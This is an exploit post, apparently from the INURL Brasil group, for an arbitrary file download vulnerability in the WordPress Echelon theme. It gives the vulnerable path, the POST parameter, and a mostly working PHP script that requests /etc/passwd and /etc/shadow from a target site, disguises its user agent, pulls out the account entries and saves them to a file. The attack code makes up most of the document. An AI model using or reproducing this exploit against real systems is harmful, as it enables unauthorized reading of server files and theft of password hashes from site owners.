*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL *Description:* This exploit allows attacker to download any writable file from the server *Usage info:* Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly File download /etc/passwd & /etc/shadow Failure consists of exploring a parameter $ _POST file /wp-content/themes/echelon/lib/scripts/dl-skin.php The following fields are exploited for Arbitrary File Download *POST:* _mysite_download_skin={$config['file']}&submit=Download ex: _mysite_download_skin=/etc/passwd&submit=Download *Exploit:* $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE; } function main($config,$rest) { __plus(); print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n"; $res.=$config['line'] . "\n"; foreach ($_final as $value) { $res.="0x " . date("h:m:s") . " [VALUE]: $value\n"; } $res.=$config['line']; __plus(); file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; } else { print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n"; } } print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; $config['file'] = '/etc/passwd'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); print $line; print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n"; print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n"; main($config,$rest); __plus(); $config['file'] = '/etc/shadow'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); main($config,$rest); __plus();